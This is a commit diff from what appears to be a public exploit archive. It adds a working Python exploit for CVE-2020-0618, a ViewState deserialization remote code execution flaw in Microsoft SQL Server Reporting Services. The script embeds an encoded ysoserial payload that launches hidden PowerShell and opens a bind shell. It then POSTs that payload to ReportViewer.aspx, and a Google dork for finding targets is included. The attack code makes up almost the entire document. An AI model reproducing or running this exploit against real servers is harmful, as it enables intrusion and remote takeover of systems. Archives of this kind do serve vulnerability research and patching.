DB: 2020-09-18

1 changes to exploits/shellcodes Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
2020-09-18 05:02:05 +00:00 · 2020-09-18 05:02:05 +00:00 · 133dc9fc81
commit 133dc9fc81
parent 3080c3ca18
2 changed files with 195 additions and 0 deletions
--- a/exploits/windows/remote/48816.py
+++ b/exploits/windows/remote/48816.py
@ -0,0 +1,194 @@
+# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
+# Google Dork: inurl:ReportViewer.aspx
+# Date: 2020-09-17
+# Exploit Author: West Shepherd
+# Vendor Homepage: https://www.microsoft.com
+# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR),
+Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL
+Server 2012 32-bit/x64 SP2 (QFE)
+# Tested on: Windows 2016
+# CVE : CVE-2020-0618
+# Credit goes to Soroush Dalili
+# Source:
+# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
+# https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
+
+#!/usr/bin/python
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+from requests_ntlm import HttpNtlmAuth
+import argparse, requests, logging
+from bs4 import BeautifulSoup
+from sys import argv, exit, stderr, stdout
+
+# to create a payload (default is bindshell on 0.0.0.0:65535):
+# .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..."
+
+
+class Exploit:
+    payload = '/wEy4hYAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAqAUvYyBwb3dlcnNoZWxsLmV4ZSAtZXhlYyBieXBhc3MgLW5vbmludGVyYWN0aXZlIC1ub2V4aXQgLXdpbmRvd3N0eWxlIGhpZGRlbiAtYyBpZXgoW3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6ZGVmYXVsdC5nZXRzdHJpbmcoW3N5c3RlbS5jb252ZXJ0XTo6ZnJvbWJhc2U2NHN0cmluZygnSkdFOVczTjVjM1JsYlM1dVpYUXVjMjlqYTJWMGN5NTBZM0JzYVhOMFpXNWxjbDAyTlRVek5Uc2tZUzV6ZEdGeWRDZ3BPeVJqUFNSaExtRmpZMlZ3ZEhSamNHTnNhV1Z1ZENncE95UmxQU1JqTG1kbGRITjBjbVZoYlNncE8xdGllWFJsVzExZEpHYzlNQzR1TmpVMU16VjhKWHN3ZlR0M2FHbHNaU2dvSkdnOUpHVXVjbVZoWkNna1p5d3dMQ1JuTG14bGJtZDBhQ2twTFc1bElEQXBleVJzUFNodVpYY3RiMkpxWldOMElDMTBlWEJsYm1GdFpTQnplWE4wWlcwdWRHVjRkQzVoYzJOcGFXVnVZMjlrYVc1bktTNW5aWFJ6ZEhKcGJtY29KR2NzTUN3a2FDazdKRzQ5S0dsbGVDQWtiQ0F5UGlZeGZHOTFkQzF6ZEhKcGJtY3BPeVJ3UFNJa0tDUnVLU1FvS0hCM1pDa3VjR0YwYUNrK0lqc2tjVDBvVzNSbGVIUXVaVzVqYjJScGJtZGRPanBoYzJOcGFTa3VaMlYwWW5sMFpYTW9KSEFwT3lSbExuZHlhWFJsS0NSeExEQXNKSEV1YkdWdVozUm9LVHNrWlM1bWJIVnphQ2dwZlRza1l5NWpiRzl6WlNncE95UmhMbk4wYjNBb0tUc05DZz09JykpKQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL'
+    timeout = 0.5
+    cookies = {}
+    params = {}
+
+    def __init__(self, opt):
+        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+        self.username = '%s\\%s' % (opt.domain, opt.username)
+        self.target = '%s%s' % (opt.target, opt.path)
+        self.password = opt.password
+        self.session = requests.session()
+        self.redirect = opt.redirect
+        self.proxies = {
+            'http': 'http://%s' % opt.proxy,
+            'https': 'http://%s' % opt.proxy
+        } if opt.proxy != '' else {}
+        self.headers = {
+            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko)',
+            'Content-Type': 'application/x-www-form-urlencoded'
+        }
+        self.form = {
+            '__VIEWSTATE': '',
+            'NavigationCorrector$PageState': 'NeedsCorrection',
+            'NavigationCorrector$ViewState': self.payload
+        }
+        if opt.debug:
+            self.debug()
+
+    def info(self, message):
+        stdout.write('[+] %s\n' % str(message))
+        return self
+
+    def error(self, message):
+        stderr.write('[-] error: %s\n' % str(message))
+        return self
+
+    def doGet(self, url, params=None, values=None):
+        self.info('sending get request to %s' % url)
+        try:
+            return self.session.get(
+                url=url,
+                verify=False,
+                allow_redirects=self.redirect,
+                headers=self.headers,
+                cookies=self.cookies,
+                proxies=self.proxies,
+                data=values,
+                params=params,
+                auth=HttpNtlmAuth(self.username, self.password)
+            ) if self.username != '\\' else self.session.get(
+                url=url,
+                verify=False,
+                allow_redirects=self.redirect,
+                headers=self.headers,
+                cookies=self.cookies,
+                proxies=self.proxies,
+                data=values,
+                params=params
+            )
+        except Exception as err:
+            self.error(err)
+
+    def doPost(self, url, values=None, params=None):
+        self.info('sending post request to %s' % url)
+        try:
+            return self.session.post(
+                url=url,
+                data=values,
+                verify=False,
+                allow_redirects=self.redirect,
+                headers=self.headers,
+                cookies=self.cookies,
+                proxies=self.proxies,
+                params=params,
+                auth=HttpNtlmAuth(self.username, self.password)
+            ) if self.username != '\\' else self.session.post(
+                url=url,
+                data=values,
+                verify=False,
+                allow_redirects=self.redirect,
+                headers=self.headers,
+                cookies=self.cookies,
+                proxies=self.proxies,
+                params=params
+            )
+        except Exception as err:
+            self.error(err)
+
+    def parsePage(self, content):
+        self.info('parsing form values')
+        soup = BeautifulSoup(content, 'lxml')
+        for tag in soup.select('input'):
+            try:
+                self.form[tag['name']] = tag['value']
+            except Exception as err:
+                self.error(err)
+        return self
+
+    def debug(self):
+        self.info('debugging enabled')
+        try:
+            import http.client as http_client
+        except ImportError:
+            import httplib as http_client
+        http_client.HTTPConnection.debuglevel = 1
+        logging.basicConfig()
+        logging.getLogger().setLevel(logging.DEBUG)
+        requests_log = logging.getLogger("requests.packages.urllib3")
+        requests_log.setLevel(logging.DEBUG)
+        requests_log.propagate = True
+        return self
+
+    def getForm(self):
+        self.info('retrieving form values')
+        resp = self.doGet(url=self.target)
+        self.parsePage(content=resp.content)
+        return self
+
+    def exploit(self):
+        self.info('exploiting target')
+        resp = self.doPost(url=self.target, params=self.params,
+values=self.form)
+        self.info('received response %d' % resp.status_code)
+        return self
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(
+        description='CVE-2020-0618 SQL Server Reporting Services
+ViewState Deserialization exploit',
+        add_help=True
+    )
+    try:
+        parser.add_argument('-target', action='store', help='Target
+address: http(s)://target.com ')
+        parser.add_argument('-username', action='store', default='',
+help='Username to use: first.last')
+        parser.add_argument('-domain', action='store', default='',
+help='User domain to use: domain.local')
+        parser.add_argument('-password', action='store', default='',
+help='Password to use: Summer2020')
+        parser.add_argument('-debug', action='store', default=False,
+help='Enable debugging: False')
+        parser.add_argument('-redirect', action='store',
+default=False, help='Follow redirects: False')
+        parser.add_argument('-proxy', action='store', default='',
+help='Enable proxy: 10.10.10.10:8080')
+        parser.add_argument('-path', action='store',
+default='/ReportServer/pages/ReportViewer.aspx', help='Path to page')
+
+        if len(argv) == 1:
+            parser.print_help()
+            exit(1)
+
+        options = parser.parse_args()
+        Exploit(opt=options).exploit()
+
+    except Exception as error:
+        stderr.write('[-] error in main %s\n' % str(error))
+
+
+Regards,
+
+West Shepherd
+OSWE | OSCE | OSCP | OSWP | CEH | Security+
+West Lee Shepherd, LLC
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -17816,6 +17816,7 @@ id,file,description,date,author,type,platform,port
 42787,exploits/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access",2017-09-25,LiquidWorm,remote,hardware,
 42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
+48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,